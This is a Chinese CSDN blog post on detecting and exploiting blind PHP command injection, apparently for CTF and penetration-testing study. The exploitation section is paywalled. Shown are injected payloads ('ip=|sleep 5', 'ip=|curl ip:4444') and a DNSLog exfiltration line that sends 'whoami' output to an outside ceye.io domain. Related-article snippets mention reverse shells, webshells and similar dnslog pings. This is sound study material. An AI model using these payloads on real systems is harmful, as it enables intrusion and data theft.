浅谈PHP无回显命令执行的利用

最新推荐文章于 2023-12-14 21:36:58 发布
最新推荐文章于 2023-12-14 21:36:58 发布
阅读量599 收藏
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41679427/article/details/110311295
版权
本文介绍了如何判断和利用PHP无回显命令执行漏洞,包括审计代码、利用延时、HTTP和DNS请求来判断命令执行,以及多种利用方法,如写入文件、写webshell、DNSLog、反弹shell等。
摘要由CSDN通过智能技术生成

前言

在CTF题或在一些渗透测试中往往会遇到没有回显的命令执行漏洞,为了能更好的实现对无回显命令执行漏洞的利用,我对此进行了简单总结。

判断方法

命令执行可能会存在命令执行但没有回显,所以首先要判断命令是否有执行。确定命令可以执行,然后就可以进行无回显命令执行的利用了。

1、审计代码

审计代码,根据代码逻辑判断(这个就需要扎实的审计代码能力的功底了)

2、利用延时

ip=|sleep 5

如果执行后延时5秒,就证明测试点存在命令执行漏洞

3、HTTP请求

注意:ping命令不会产生http请求

1.在公网服务器监听监听端口

nc -lp 4444

2.向目标服务器发起http请求,执行curl命令

ip=|curl ip:4444

如果向目标服务器发起http请求后,公网服务器监听端口得到一些信息,就证明测试点存在命令执行漏洞。

4、DNS请求

如果请求的目标不是ip地址而是域名,那么域名最终还要转化成ip地址,就肯定要做一次域名解析请求。那么假设我有个可控的二级域名,那么它发出三级域名解析的时候,我这边是能够拿到它的域名解析请求的,这就相当于可以配合DNS请求进行命令执行的判断,这一般就被称为dnslog。(要通过dns请求即可通过ping命令,也能通过curl命令,只要对域名进行访问,让域名服务器进行域名解析就可实现) 来源:安全脉搏

(1)首先去ceye.io注册个账号,注册完后会给一个域名

我注册后给的域名是v4utm7.ceye.io
(2)如果有域名解析请求就会被记录。访问qwzf.v4utm7.ceye.io,那么就会记录下来这个域名解析请求。


简单测试一下向目标服务器发起http请求,执行下面的命令

ip=|curl `whoami`.v4utm7.ceye.io


查看dnslog

若果得到执行结果(如上面执行whoami命令,得到www-data),就说明测试点存在命令执行。

利用方法

了解了无回显命令

最低0.47元/天 解锁文章
CanMeng'Blog
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF中ping文件执行漏洞无回显反弹拿flag
拉风的鲨鱼的博客
03-31 9565
打开网页内容如下 我们来看一下核心代码 <?php include_once "code.txt"; if (isset($_POST['ip'])) { $p=$_POST['ip']; if(preg_match("/(;|`|&| |\\$|python|ruby|perl...
php--无回显情况下的命令执行
最新发布
金灰的博客
06-02 1303
免责声明:本文仅做技术交流与学习...建立通道(信道) --数据传输的路径shell_exec 与 system 相比,shell_exec没有回显结果.
浅谈PHP回显命令执行
qidiandexiaowu
11-09 996
以前学过有回显命令执行,但是无回显的还是第一次接触,这次就记录下来。 判断方法: 1.审计代码(我也不是很会) 2.延时判断 ip=|sleep 5 时间延长了就可能有无回显命令执行。 3.HTTP请求 ①在公网服务器监听监听端口 nc -lp 4444 ②向目标服务器发起http请求,执行curl命令 ip=|curl ip:4444 如果公网服务器能从监听端口得到一些信息,那麽他就可能存在无回显命令执行。 4.DNS请求 第一步 在解析的时候浏览器会检查缓存中有没有域名对应的ip地址,这个缓
[CTF]命令执行回显利用
cosmoslin的博客
02-21 8162
背景 exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
ctfshowPHP特性
遇事不决冲冲冲
08-23 4462
web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 数组绕过正则表达式,也就是说我们不按规定去
浅谈SSRF漏洞之基础篇
weixin_39664643的博客
11-19 1169
SSRF漏洞利用之 文件读取、端口扫描
浅谈漏洞及其分类
am_03的博客
01-01 1万+
浅谈漏洞及其分类 一、漏洞概念 漏洞是指一个系统上硬件、软件、协议等具体实现或系统安全策略上存在的弱点或缺陷,系统对特定威胁攻击或危险事件的敏感性,或进行攻击的威胁作用的可能性。这些缺陷、错误或不合理之处可能被有意或无意地利用,可以使攻击者能够在未授权的情况下访问或破坏系统,从而对一个组织的资产或运行造成不利影响,如信息系统被攻击或控制,重要资料被窃取,用户数据被篡改,系统被作为入侵其他主机系统的跳板。从目前发现的漏洞来看,应用软件中的漏洞远远多于操作系统中的漏洞。 世界上没有绝对安全的系统,也没有人敢说自
浅谈云上攻防 --SSRF 漏洞带来的新威胁
YDclub的博客
10-09 1486
前言 在《浅谈云上攻防——元数据服务带来的安全挑战》一文中,生动形象的为我们讲述了元数据服务所面临的一系列安全问题,而其中的问题之一就是通过SSRF去攻击元数据服务;文中列举了2019年美国第一资本投资国际集团(Capital One Financial Corp.,下“Capital One公司”)信息泄漏的案例;我们内部也监测到过类似的事件:测试人员通过SSRF漏洞攻击元数据服务,并将获取到的AK信息存储到日志服务中,然后在日志服务中获取到了AK信息,最终通过获取到的AK信息控制了超过200台服务器。
浅谈IP地址和网络安全
m0_70402478的博客
06-11 998
今天学了一下关于IP地址的一些东西,发现IP地址虽然只有简简单单的几串数字组合而成,然而实际上却有很深的玄机。本人也想成为一名网络安全的小白,然后我发奋看视频,看书,也渐渐了解了网络安全这一大框,大多的网络安全渗透的原理也略知一二。比如sql注入,利用精心构造出来的sql语句,从而获取到你想要的数据库信息,我们一般可以使用一些漏洞扫描工具或者sql注入脚本比如sqlmap进行快速的注入,但是太没有意思了,而且效果也不是很好。所以我们要深入学习手工注入,一般的手工注入有回显注入,就是你输入sql语句它会给你明
Buuctf 刷题记录
m0_62706061的博客
10-12 1740
php反序列化绕过之,过滤\00*\00等
蚁剑返回数据为空的几种原因
热门推荐
m0_73581247的博客
03-13 1万+
今天连接蚁剑死活连不上到头来发现post没有大写。1,可能是post没有大小写,中国蚁剑返回数据为空,2,看防火墙有没有关,3,代理是不是手动。
蚁剑操作手册
weixin_44820552的博客
03-27 3015
蚁剑(AntSword)是一款开源的跨平台WebShell管理工具,将一句话木马上传到被测平台,通过蚁剑进行连接获取被测平台的服务器webshell。
ctfshow php特性
Je3Z的博客
04-02 808
web115 web123 $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&
命令执行回显的一些姿势
zhangge3663的博客
05-31 3523
前言 最近演练遇到了拿shell后,由于是延时注入,让我极其难受。于是,学习了一下命令执行回显的一些姿势 windows环境 1.ping %USERNAME%.2plmqc.dnslog.cn 这里的%username%为用户变量 附上windows常用变量: %APPDATA% : 列出应用程序数据的默认存放位置。 %CD% : 列出当前目录。 %CLIENTNAME% : 列出联接到终端服务会话时客户端的NETBIOS名。 %CMDCMDLINE% : 列出启动当前
一招迅速搞定无回显函数shell_exec
csjjjd的博客
12-14 889
今天带大家学习一下在CTF命令执行时遇到无回显怎么办?这里拿一道题目举例:这道题是不是很简单,直接???hp不就可以了吗?
rce(无回显
qq_62046696的博客
07-20 4346
RCE英文全称分为远程命令执行ping和远程代码执行evel。漏洞出现的原因没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。...
ctf 监听端口_浅谈ctf中的无回显
06-10
CTF中的无回显指的是无法直接从应用程序输出或网络流量中获取结果的情况。在某些情况下,CTF比赛的参赛者需要在没有回显的情况下解决一些问题,例如监听某个端口。 在CTF中,监听端口通常意味着需要在某个特定的端口上监听并接受传入的连接。这可能需要编写一个简单的服务或服务器程序来监听该端口,等待连接并对其进行处理。 在无回显的情况下,参赛者无法直接看到他们的输入是否产生了任何输出。这意味着他们需要尝试不同的输入来确定他们的输入是否被正确处理。这需要一些技巧和经验,因为他们必须根据一些指示或假设来尝试输入,以便找到正确的答案。 因此,在CTF中,无回显是一种常见的情况,需要参赛者具备一定的技巧和经验才能成功地解决问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值